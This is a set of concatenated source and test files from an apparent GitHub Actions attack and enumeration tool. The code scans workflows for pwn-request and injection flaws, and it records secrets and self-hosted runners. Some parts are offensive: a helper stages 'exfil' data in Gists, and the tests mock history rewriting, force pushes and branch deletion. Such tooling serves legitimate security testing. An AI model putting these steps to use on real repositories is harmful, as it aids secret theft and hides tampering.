        """Check for potential pwn request vulnerabilities.

        Returns:
            dict: A dictionary containing the job names as keys and a
            list of potentially vulnerable tokens as values.
        """

        vulnerable_triggers = self.get_vulnerable_triggers()
        if not vulnerable_triggers and not bypass:
            return {}

        checkout_risk = {}
        candidates = {}

        checkout_info = self.analyze_checkouts()
        for job_name, job_content in checkout_info.items():

            steps_risk = job_content["check_steps"]
            if steps_risk:

                candidates[job_name] = {}
                candidates[job_name]["confidence"] = job_content["confidence"]
                candidates[job_name]["gated"] = job_content["gated"]
                candidates[job_name]["steps"] = steps_risk
                if "if_check" in job_content and job_content["if_check"]:
                    candidates[job_name]["if_check"] = job_content["if_check"]
                else:
                    candidates[job_name]["if_check"] = ""

        if candidates:
            checkout_risk["candidates"] = candidates
            checkout_risk["triggers"] = vulnerable_triggers

        return checkout_risk

    def check_rules(self, gate_rules):
        """Checks environment protection rules from the API against those specified in the job.

        Args:
            gate_rules (list): List of rules to check against.

        Returns:
            bool: Whether the job is violating any of the rules.
        """
        for rule in gate_rules:
            for job in self.jobs:
                for deploy_rule in job.deployments:
                    if rule in deploy_rule:
                        return False
        return True

    def check_injection(self, bypass=False):
        """Check for potential script injection vulnerabilities.

        Returns:
            dict: A dictionary containing the job names as keys and a list
            of potentially vulnerable tokens as values.
        """
        vulnerable_triggers = self.get_vulnerable_triggers()
        if not vulnerable_triggers and not bypass:
            return {}

        injection_risk = {}

        for job in self.jobs:

            for step in job.steps:
                # No TOCTOU possible for injection

                if step.is_gate:
                    break

                # Check if we marked the step as being an injectable script of some kind.
                if step.is_script:
                    tokens = step.getTokens()
                else:
                    continue
                tokens = filter_tokens(tokens)

                def check_token(token, container):
                    if (
                        token.startswith("env.")
                        and token.split(".")[1] in container["env"]
                    ):
                        value = container["env"][token.split(".")[1]]

                        if value and type(value) not in [int, float] and "${{" in value:
                            return True
                        else:
                            return False
                    return True

                # Remove tokens that map to workflow or job level environment variables, as
                # these will not be vulnerable to injection unless they reference
                # something by context expression.
                env_sources = [self.parsed_yml, job.job_data, step.step_data]
                for env_source in env_sources:
                    if "env" in env_source and tokens:
                        tokens = [
                            token for token in tokens if check_token(token, env_source)
                        ]

                if tokens:
                    if job.needs and self.backtrack_gate(job.needs):
                        break

                    if job.job_name not in injection_risk:
                        injection_risk[job.job_name] = {}
                        injection_risk[job.job_name]["if_check"] = job.evaluateIf()

                    injection_risk[job.job_name][step.name] = {
                        "variables": list(set(tokens))
                    }
                    if step.evaluateIf():
                        injection_risk[job.job_name][step.name][
                            "if_checks"
                        ] = step.evaluateIf()
        if injection_risk:
            injection_risk["triggers"] = vulnerable_triggers

        return injection_risk

    def self_hosted(self):
        """Analyze if any jobs within the workflow utilize self-hosted runners.

        Returns:
           list: List of jobs within the workflow that utilize self-hosted
           runners.
        """
        sh_jobs = []

        for job in self.jobs:
            if job.isSelfHosted():
                sh_jobs.append((job.job_name, job.job_data))
            elif job.isCaller():
                if job.external_caller:
                    self.sh_callees.append(job.uses)
                else:
                    self.sh_callees.append(job.uses.split("/")[-1])

        return sh_jobs



import datetime

from gatox.models.runner import Runner
from gatox.models.secret import Secret


class Repository:
    """Simple wrapper class to provide accessor methods against the repository
    JSON response from GitHub.
    """

    def __init__(self, repo_data: dict):
        """Initialize wrapper class.

        Args:
            repo_json (dict): Dictionary from parsing JSON object returned from
            GitHub
        """
        self.repo_data = repo_data
        # Temporary hack until full transition to GQL
        if "environments" not in self.repo_data:
            self.repo_data["environments"] = []

        self.name = self.repo_data["full_name"]
        self.org_name = self.name.split("/")[0]
        self.secrets: list[Secret] = []
        self.org_secrets: list[Secret] = []
        self.sh_workflow_names = []
        self.enum_time = datetime.datetime.now()

        self.permission_data = self.repo_data["permissions"]
        self.sh_runner_access = False
        self.accessible_runners: list[Runner] = []
        self.runners: list[Runner] = []
        self.pwn_req_risk = []
        self.injection_risk = []

    def is_admin(self):
        return self.permission_data.get("admin", False)

    def is_maintainer(self):
        return self.permission_data.get("maintain", False)

    def can_push(self):
        return self.permission_data.get("push", False)

    def can_pull(self):
        return self.permission_data.get("pull", False)

    def is_private(self):
        return self.repo_data["visibility"] != "public"

    def is_archived(self):
        return self.repo_data["archived"]

    def is_internal(self):
        return self.repo_data["visibility"] == "internal"

    def is_public(self):
        return self.repo_data["visibility"] == "public"

    def is_fork(self):
        return self.repo_data["fork"]

    def can_fork(self):
        return self.repo_data.get("allow_forking", False)

    def default_path(self):
        return f"{self.repo_data['html_url']}/blob/{self.repo_data['default_branch']}"

    def update_time(self):
        """Update timestamp."""
        self.enum_time = datetime.datetime.now()

    def set_accessible_org_secrets(self, secrets: list[Secret]):
        """Sets organization secrets that can be read using a workflow in
        this repository.

        Args:
            secrets (List[Secret]): List of Secret wrapper objects.
        """
        self.org_secrets = secrets

    def set_pwn_request(self, pwn_request_package: dict):
        self.pwn_req_risk.append(pwn_request_package)

    def clear_pwn_request(self, workflow_name):
        """Remove pwn request entry since it's a false positive."""
        self.pwn_req_risk = [
            element
            for element in self.pwn_req_risk
            if element["workflow_name"] != workflow_name
        ]

    def has_pwn_request(self):
        """Return True if there are any pwn request risks."""
        return len(self.pwn_req_risk) > 0

    def set_injection(self, injection_package: dict):
        """Set injection risk package."""
        self.injection_risk.append(injection_package)

    def has_injection(self):
        """Return True if there are any injection risks."""
        return len(self.injection_risk) > 0

    def set_secrets(self, secrets: list[Secret]):
        """Sets secrets that are attached to this repository.

        Args:
            secrets (List[Secret]): List of repo level secret wrapper objects.
        """
        self.secrets = secrets

    def set_runners(self, runners: list[Runner]):
        """Sets list of self-hosted runners attached at the repository level."""
        self.sh_runner_access = True
        self.runners = runners

    def add_self_hosted_workflows(self, workflows: list):
        """Add a list of workflow file names that run on self-hosted runners."""
        self.sh_workflow_names.extend(workflows)

    def add_accessible_runner(self, runner: Runner):
        """Add a runner is accessible by this repo. This runner could be org
        level or repo level.

        Args:
            runner (Runner): Runner wrapper object
        """
        self.sh_runner_access = True
        self.accessible_runners.append(runner)

    def toJSON(self):
        """Converts the repository to a Gato JSON representation."""
        representation = {
            "name": self.name,
            "enum_time": self.enum_time.ctime(),
            "permissions": self.permission_data,
            "can_fork": self.can_fork(),
            "stars": self.repo_data["stargazers_count"],
            "runner_workflows": [wf for wf in self.sh_workflow_names],
            "accessible_runners": [
                runner.toJSON() for runner in self.accessible_runners
            ],
            "repo_runners": [runner.toJSON() for runner in self.runners],
            "repo_secrets": [secret.toJSON() for secret in self.secrets],
            "org_secrets": [secret.toJSON() for secret in self.org_secrets],
            "pwn_request_risk": self.pwn_req_risk,
            "injection_risk": self.injection_risk,
        }

        return representation



"""
Copyright 2024, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

from gatox.cli.output import Output
from gatox.enumerate.reports.report import Report
from gatox.models.repository import Repository


class RunnersReport(Report):
    """Generate a report on self-hosted runners attached to the repository."""

    @classmethod
    def report_runners(cls, repo: Repository):
        """Reports Self-Hosted Runners attached to the repository."""
        if repo.accessible_runners:
            cls.print_divider()
            cls.print_header(repo, "Self-Hosted Runners")

            Output.generic(
                f" Potential Runner Workflows: {Output.yellow(', '.join(repo.sh_workflow_names))}"
            )

            for runner in repo.accessible_runners:
                Output.generic(f"{'-'*78}")
                if runner.non_ephemeral:
                    Output.generic(f" Runner Type: {Output.red('NON-EPHEMERAL')}")
                else:
                    Output.generic(f" Runner Type: {Output.green('EPHEMERAL')}")

                Output.generic(f" Runner Name: {Output.bright(runner.runner_name)}")
                Output.generic(f" Machine Name: {Output.bright(runner.machine_name)}")
                Output.generic(f" Runner Scope: {Output.bright(runner.runner_type)}")
                Output.generic(f" Runner Groups: {Output.bright(runner.runner_group)}")
                Output.generic(f" Labels: {Output.bright(', '.join(runner.labels))}")

            cls.print_divider()



import pathlib
import os
import pytest
import subprocess

from unittest.mock import MagicMock, patch, call, ANY, mock_open
from gatox.git.git import Git
from gatox.git.utils import version_check, path_check, sed_check


@patch("gatox.git.utils.subprocess.run")
def test_check_git(mock_run):
    """Test test that the git version check works."""

    mock_stdout = MagicMock()
    mock_stdout.configure_mock(**{"stdout": "git version 2.38.2\n", "returncode": 0})

    mock_run.return_value = mock_stdout

    git_status = version_check()
    mock_run.assert_called_once()

    assert git_status == "2.38.2"


@patch("gatox.git.utils.subprocess.run")
def test_check_git_fail(mock_run):
    """Test failure case of git version check."""

    mock_stdout = MagicMock()
    mock_stdout.configure_mock(
        **{"stdout": "command not found: git\n", "returncode": 1}
    )

    mock_run.return_value = mock_stdout

    git_status = version_check()
    mock_run.assert_called_once()

    assert git_status is False


@patch("gatox.git.utils.subprocess.run")
def test_check_git_malformed(mock_run):
    """Test failure case of git version check."""

    mock_stdout = MagicMock()
    mock_stdout.configure_mock(**{"stdout": "git bad!\n", "returncode": 0})

    mock_run.return_value = mock_stdout

    git_status = version_check()
    mock_run.assert_called_once()

    assert git_status is False


@patch("gatox.git.utils.shutil.which")
def test_git_path_check(mock_run):
    """Test checking whether git exists on the path."""

    mock_run.return_value = "/usr/local/bin/git"

    exists = path_check()
    mock_run.assert_called_once()

    assert exists == "/usr/local/bin/git"


@patch("gatox.git.utils.shutil.which")
def test_sed_check(mock_run):
    """Test checking whether sed exists on the path."""
    mock_run.return_value = "/usr/bin/sed"

    exists = sed_check()
    mock_run.assert_called_once()

    assert exists == "/usr/bin/sed"


@patch("gatox.git.utils.shutil.which")
def test_git_path_not_found(mock_run):
    """Test case where git is not on path."""
    mock_run.return_value = None

    exists = path_check()
    mock_run.assert_called_once()

    assert exists is None


def test_constructor():
    """Tests the constructor for the git class."""
    with pytest.raises(ValueError):
        Git(
            "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
            "RepoOnly",
            proxies={"http": "http://proxy", "https": "https://proxy"},
        )


def test_extract_workflows():
    """Tests extracting workflows from the '.github' folder."""
    curr_path = pathlib.Path(__file__).parent.resolve()

    git = Git("ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "dummy/workflow_test")

    test_repo_path = os.path.join(curr_path, "files/")
    ymls = git.extract_workflow_ymls(repo_path=test_repo_path)

    assert len(ymls) == 1


@patch("gatox.git.git.subprocess.Popen")
def test_perform_clone(mock_subprocess):
    """Test performing a repo clone."""
    git = Git("ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "gitferret/workflow_test")

    call_1 = (
        "git clone --depth 1 --filter=blob:none --sparse "
        "https://ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        "@github.com/gitferret/workflow_test"
    ).split(" ")
    call_2 = "git sparse-checkout set .github".split(" ")

    mock_pipe = MagicMock()

    mock_pipe.returncode = 0
    mock_subprocess.return_value = mock_pipe

    ret = git.perform_clone()
    assert ret is True
    mock_subprocess.assert_has_calls(
        [
            call(call_1, cwd=ANY, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL),
            call(call_2, cwd=ANY, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL),
        ],
        any_order=True,
    )
    assert mock_pipe.wait.call_count == 4


@patch("gatox.git.git.subprocess.Popen")
def test_perform_clone_fail(mock_subprocess):
    """Failure test case performing a repo clone."""
    git = Git("ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "gitferret/workflow_test")

    call_1 = (
        "git clone --depth 1 --filter=blob:none --sparse "
        "https://ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        "@github.com/gitferret/workflow_test"
    ).split(" ")
    mock_pipe = MagicMock()

    mock_pipe.returncode = 1
    mock_subprocess.return_value = mock_pipe

    ret = git.perform_clone()

    mock_subprocess.assert_called_once_with(
        call_1, cwd=ANY, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
    )
    assert mock_pipe.wait.call_count == 1
    assert ret is False


@patch("gatox.git.git.subprocess.Popen")
def test_perform_commit(mock_subprocess):
    """Test performing a commit"""
    git = Git("ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "gitferret/workflow_test")

    message = "unittest commit"

    curr_path = pathlib.Path(__file__).parent.resolve()
    test_repo_path = os.path.join(curr_path, "files/")

    call_1 = "git add test.txt".split(" ")
    call_2 = f"git commit -m".split(" ")
    call_2.append(message)
    call_3 = "git rev-parse HEAD".split(" ")

    mock_pipe = MagicMock()

    mock_pipe.returncode = 0
    mock_subprocess.return_value = mock_pipe

    with patch("builtins.open", mock_open(read_data="")) as mock_file:

        ret = git.commit_file(
            b"TESTDATA", "test.txt", repo_path=test_repo_path, message=message
        )

        mock_file().write.assert_called_once()

        mock_subprocess.assert_has_calls(
            [
                call(
                    call_1,
                    cwd=ANY,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.DEVNULL,
                ),
                call(
                    call_2,
                    cwd=ANY,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.DEVNULL,
                ),
                call(
                    call_3, cwd=ANY, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL
                ),
            ],
            any_order=True,
        )
    assert mock_pipe.wait.call_count == 3
    # TODO: Mock return value of rev-parse
    # assert ret is True


@patch("gatox.git.git.subprocess.Popen")
def test_rewrite_commit(mock_subprocess):
    """Unit test for re-writing commit history."""
    git = Git("ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "gitferret/workflow_test")

    curr_path = pathlib.Path(__file__).parent.resolve()
    test_repo_path = os.path.join(curr_path, "files/")

    call_1 = ("git rebase -i HEAD^").split(" ")
    mock_pipe = MagicMock()

    mock_pipe.returncode = 0
    mock_subprocess.return_value = mock_pipe

    ret = git.rewrite_commit(repo_path=test_repo_path)

    mock_subprocess.assert_called_once_with(
        call_1, cwd=ANY, env=ANY, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
    )

    assert mock_pipe.wait.call_count == 1
    _, kwargs = mock_subprocess.call_args_list[0]
    assert "GIT_SEQUENCE_EDITOR" in kwargs["env"]
    seq_editor = kwargs["env"]["GIT_SEQUENCE_EDITOR"]

    assert seq_editor == "sed -i.bak 's/pick/drop/g'"

    assert ret is True


@patch("gatox.git.git.subprocess.Popen")
def test_push(mock_subprocess):
    """Test performing a commit"""
    git = Git("ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "gitferret/workflow_test")

    curr_path = pathlib.Path(__file__).parent.resolve()
    test_repo_path = os.path.join(curr_path, "files/")

    branch_name = "testingBranch"
    upstream_branch = "develop"

    call_1 = "git rev-parse --abbrev-ref HEAD".split(" ")
    call_2 = (
        f"git push --set-upstream origin" f" {branch_name}:{upstream_branch}"
    ).split(" ")

    mock_pipe = MagicMock()

    mock_pipe.returncode = 0
    # Set mock for the upstream branch when we rev parse
    mock_pipe.communicate.return_value.__getitem__.return_value.decode.return_value.strip.return_value = (
        "testingBranch"
    )

    mock_subprocess.return_value = mock_pipe

    ret = git.push_repository("develop", repo_path=test_repo_path)

    mock_subprocess.assert_has_calls(
        [
            call(call_1, cwd=ANY, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL),
            call(call_2, cwd=ANY, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL),
        ],
        any_order=True,
    )
    assert mock_pipe.wait.call_count == 2
    assert ret is True


@patch("gatox.git.git.subprocess.Popen")
def test_push_fail(mock_subprocess):
    """Test performing a commit"""
    git = Git("ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "gitferret/workflow_test")

    curr_path = pathlib.Path(__file__).parent.resolve()
    test_repo_path = os.path.join(curr_path, "files/")

    branch_name = "testingBranch"
    upstream_branch = "develop"

    call_1 = "git rev-parse --abbrev-ref HEAD".split(" ")
    call_2 = (
        f"git push --set-upstream origin" f" {branch_name}:{upstream_branch}"
    ).split(" ")

    mock_pipe = MagicMock()

    mock_pipe.returncode = 1
    # Set mock for the upstream branch when we rev parse
    mock_pipe.communicate.return_value.__getitem__.return_value.decode.return_value.strip.return_value = (
        "testingBranch"
    )

    mock_subprocess.return_value = mock_pipe

    ret = git.push_repository("develop", repo_path=test_repo_path)

    mock_subprocess.assert_has_calls(
        [
            call(call_1, cwd=ANY, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL),
            call(call_2, cwd=ANY, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL),
        ],
        any_order=True,
    )
    assert mock_pipe.wait.call_count == 2
    assert ret is False


@patch("gatox.git.git.subprocess.Popen")
def test_push_force(mock_subprocess):
    """Test performing a commit"""
    git = Git("ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "gitferret/workflow_test")

    curr_path = pathlib.Path(__file__).parent.resolve()
    test_repo_path = os.path.join(curr_path, "files/")

    branch_name = "testingBranch"
    upstream_branch = "develop"

    call_1 = "git rev-parse --abbrev-ref HEAD".split(" ")
    call_2 = (
        f"git push --set-upstream origin" f" {branch_name}:{upstream_branch} -f"
    ).split(" ")

    mock_pipe = MagicMock()

    mock_pipe.returncode = 0
    # Set mock for the upstream branch when we rev parse
    mock_pipe.communicate.return_value.__getitem__.return_value.decode.return_value.strip.return_value = (
        "testingBranch"
    )

    mock_subprocess.return_value = mock_pipe

    ret = git.push_repository("develop", force=True, repo_path=test_repo_path)

    mock_subprocess.assert_has_calls(
        [
            call(call_1, cwd=ANY, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL),
            call(call_2, cwd=ANY, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL),
        ],
        any_order=True,
    )
    assert mock_pipe.wait.call_count == 2
    assert ret is True


@patch("gatox.git.git.subprocess.Popen")
def test_delete_branch(mock_subprocess):
    """Test performing a commit"""
    git = Git("ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "gitferret/workflow_test")

    curr_path = pathlib.Path(__file__).parent.resolve()
    test_repo_path = os.path.join(curr_path, "files/")

    call_1 = "git push origin --delete testbranch -f".split(" ")

    mock_pipe = MagicMock()

    mock_pipe.returncode = 0
    mock_subprocess.return_value = mock_pipe

    ret = git.delete_branch("testbranch", repo_path=test_repo_path)

    mock_subprocess.assert_has_calls(
        [call(call_1, cwd=ANY, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)],
        any_order=True,
    )
    assert mock_pipe.wait.call_count == 1
    assert ret is True


@patch("gatox.git.git.subprocess.Popen")
def test_delete_branch_fail(mock_subprocess):
    """Test performing a commit"""
    git = Git("ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "gitferret/workflow_test")

    curr_path = pathlib.Path(__file__).parent.resolve()
    test_repo_path = os.path.join(curr_path, "files/")

    call_1 = "git push origin --delete testbranch -f".split(" ")

    mock_pipe = MagicMock()

    mock_pipe.returncode = 1
    mock_subprocess.return_value = mock_pipe

    ret = git.delete_branch("testbranch", repo_path=test_repo_path)

    mock_subprocess.assert_has_calls(
        [call(call_1, cwd=ANY, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)],
        any_order=True,
    )
    assert mock_pipe.wait.call_count == 1
    assert ret is False



"""
Copyright 2024, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import re
from gatox.configuration.configuration_manager import ConfigurationManager
from gatox.workflow_parser.expression_parser import ExpressionParser
from gatox.workflow_parser.expression_evaluator import ExpressionEvaluator
from gatox.workflow_parser.utility import decompose_action_ref


class Step:
    """Wrapper class for a Github Actions worflow step."""

    pattern = re.compile(
        r"checkout\s+(\$\{\{)?\s*(\S*([a-z$_]+)\S*)\s*(\}\})?", re.IGNORECASE
    )

    CONTEXT_REGEX = re.compile(r"\${{\s*([^}]+[^\s])\s?\s*}}")

    EVALUATOR = ExpressionEvaluator()

    TYPES = ["RUN", "ACTION"]

    def __init__(self, step_data: dict):
        """Constructor for step wrapper."""
        self.contents = None
        self.step_data = step_data
        # Means that it is a run step or an action that can be injected into.
        # User controlled context + script = vuln.
        self.is_script = False
        # Means that the step checks out code in some way.
        self.is_checkout = False
        # Means that action runs something under control of a checkout
        self.is_sink = False
        # Means that there is some kind of check that would block an external actor.
        self.is_gate = False
        self.evaluated = False
        self.name = "NONE"

        if "name" in self.step_data:
            self.name = self.step_data["name"]

        if "if" in self.step_data and self.step_data["if"]:
            self.if_condition = self.step_data["if"].replace("\n", "")
        else:
            self.if_condition = None

        if "run" in self.step_data:
            self.contents = self.step_data["run"]
            self.type = "RUN"
            self.is_script = True

            self.__process_run(self.contents)
        elif "uses" in self.step_data:
            self.uses = self.step_data["uses"]
            self.type = "ACTION"

            self.__process_action(self.uses)
        else:
            raise ValueError("Step must have either a 'run' or 'uses' key")

    def __check_sinks(self, contents):
        """Check if the contents contain a sink."""
        sinks = ConfigurationManager().WORKFLOW_PARSING["SINKS"]

        for sink in sinks:
            if sink in contents:
                return True

    def __process_run(self, contents: str):
        """Processes run steps for additional context"""
        if not contents:
            return

        # TODO make a regex for speed
        if "git checkout" in contents or "pr checkout" in contents:
            match = self.pattern.search(contents)
            if match:
                ref = match.group(2)

                static_vals = ["base", "main", "master"]

                for prefix in ConfigurationManager().WORKFLOW_PARSING["PR_ISH_VALUES"]:
                    if prefix in ref.lower() and not any(
                        substring in ref.lower() for substring in static_vals
                    ):
                        self.metadata = ref
                        self.is_checkout = True

        elif self.__check_sinks(contents):
            self.is_sink = True

    def __process_action(self, uses: str):
        """Processes actions referenced by a step to classify it. Currently, Gato-X
        attempts to classify it based on behavior like gating, checkouts, scripts, and sinks.
        """
        if not uses:
            return

        # TODO: programmatically generate a regex from these cases.
        # Custom checkout - capture the params
        if (
            "/checkout" in uses
            and "with" in self.step_data
            and "ref" in self.step_data["with"]
        ):
            ref_param = self.step_data["with"]["ref"]
            # If the ref is not a string, it's not going to reference the PR head.
            if type(ref_param) is not str:
                self.is_checkout = False
            elif "path" in self.step_data["with"]:
                # Custom path means that the checkout probably is not executed.
                self.is_checkout = False
            elif "${{" in ref_param and "base" not in ref_param:
                self.metadata = ref_param
                self.is_checkout = True

        elif "ruby/setup-ruby" in uses and "with" in self.step_data:
            if (
                "bundler-cache" in self.step_data["with"]
                and self.step_data["with"]["bundler-cache"]
            ):
                self.is_sink = True
        elif (
            "gradle-build-action" in uses
            and "with" in self.step_data
            and "arguments" in self.step_data["with"]
        ):
            self.metadata = self.step_data["with"]
        elif (
            "github-script" in uses
            and "with" in self.step_data
            and "script" in self.step_data["with"]
        ):
            self.contents = self.step_data["with"]["script"]
            if (
                "getCollaboratorPermissionLevel" in self.contents
                or "checkMembershipForUser" in self.contents
                or "listMembersInOrg" in self.contents
            ):
                self.is_gate = True

            self.is_script = True
        elif "actions-team-membership" in uses:
            self.is_gate = True
        elif "get-user-teams-membership" in uses:
            self.is_gate = True
        elif "permission" in uses:
            self.is_gate = True
        elif uses.startswith("./"):
            # Local actions are runnable, so it is a sink.
            self.is_sink = True

    def getTokens(self):
        """Get the context tokens from the step."""
        if self.contents:
            finds = self.CONTEXT_REGEX.findall(self.contents)

            extension = None
            for find in finds:
                if " || " in find:
                    extension = find.split(" || ")
                    break

            if extension:
                finds.extend(extension)
            return finds
        else:
            return None

    def getActionParts(self):
        if self.type == "ACTION":
            return

    def evaluateIf(self):
        """Evaluate the If expression by parsing it into an AST
        and then evaluating it in the context of an external user
        triggering it.
        """
        if self.if_condition and not self.evaluated:
            try:
                parser = ExpressionParser(self.if_condition)
                if self.EVALUATOR.evaluate(parser.get_node()):
                    self.if_condition = f"EVALUATED: {self.if_condition}"
                else:
                    self.if_condition = f"RESTRICTED: {self.if_condition}"
            except ValueError as ve:
                # TODO: Remove after alpha.
                self.if_condition = self.if_condition
            except NotImplementedError as ni:
                self.if_condition = self.if_condition
            except (SyntaxError, IndexError) as e:
                self.if_condition = self.if_condition
            finally:
                self.evaluated = True

        return self.if_condition



import random
import string

from gatox.cli.output import Output


def AttackUtilities():
    """ """

    @staticmethod
    def create_gist(self, gist_name: str, gist_contents: str):
        """Create a Gist with the specified contents and return the raw URL."""
        self.__setup_user_info()

        if "gist" not in self.user_perms["scopes"]:
            Output.error("Unable to create Gist without gist scope!")
            return False

        exfil_name = "".join(random.choices(string.ascii_lowercase, k=5))
        gist_params = {
            "files": {f"{gist_name}-{exfil_name}": {{"content": gist_contents}}}
        }

        result = self.api.call_post("/gists", params=gist_params)

        if result.status_code == 201:
            return result["files"][f"{gist_name}-{exfil_name}"]["raw_url"]



import os
import pathlib
import pytest
import json
import datetime

from unittest.mock import MagicMock, patch, Mock
from unittest import mock

import gatox.enumerate.repository
from gatox.models.repository import Repository
from gatox.enumerate.repository import RepositoryEnum
from gatox.cli.output import Output

TEST_REPO_DATA = None
TEST_WORKFLOW_YML = None

Output(True)


@pytest.fixture(scope="session", autouse=True)
def load_test_files(request):
    global TEST_REPO_DATA
    global TEST_WORKFLOW_YML
    curr_path = pathlib.Path(__file__).parent.resolve()
    test_repo_path = os.path.join(curr_path, "files/example_repo.json")
    test_wf_path = os.path.join(curr_path, "files/main.yaml")

    with open(test_repo_path, "r") as repo_data:
        TEST_REPO_DATA = json.load(repo_data)

    with open(test_wf_path, "r") as wf_data:
        TEST_WORKFLOW_YML = wf_data.read()


def test_enumerate_repo():
    """Test constructor for enumerator."""
    mock_api = MagicMock()

    gh_enumeration_runner = RepositoryEnum(mock_api, False, True)

    mock_api.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.retrieve_run_logs.return_value = [
        {
            "machine_name": "unittest1",
            "runner_name": "much_unit_such_test",
            "runner_type": "organization",
            "non_ephemeral": False,
            "token_permissions": {"Actions": "write"},
            "runner_group": "Default",
            "requested_labels": ["self-hosted", "Linux", "X64"],
        }
    ]

    repo_data = json.loads(json.dumps(TEST_REPO_DATA))
    test_repo = Repository(repo_data)

    gh_enumeration_runner.enumerate_repository(test_repo)

    assert test_repo.sh_runner_access is True
    assert len(test_repo.accessible_runners) > 0
    assert test_repo.accessible_runners[0].runner_name == "much_unit_such_test"


def test_enumerate_repo_admin():
    """Test constructor for enumerator."""
    mock_api = MagicMock()

    gh_enumeration_runner = RepositoryEnum(mock_api, False, True)

    mock_api.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.retrieve_run_logs.return_value = [
        {
            "machine_name": "unittest1",
            "runner_name": "much_unit_such_test",
            "runner_type": "organization",
            "non_ephemeral": False,
            "token_permissions": {"Actions": "write"},
            "runner_group": "Default",
            "requested_labels": ["self-hosted", "Linux", "X64"],
        }
    ]

    repo_data = json.loads(json.dumps(TEST_REPO_DATA))
    repo_data["permissions"]["admin"] = True
    test_repo = Repository(repo_data)

    gh_enumeration_runner.enumerate_repository(test_repo)

    assert test_repo.is_admin()
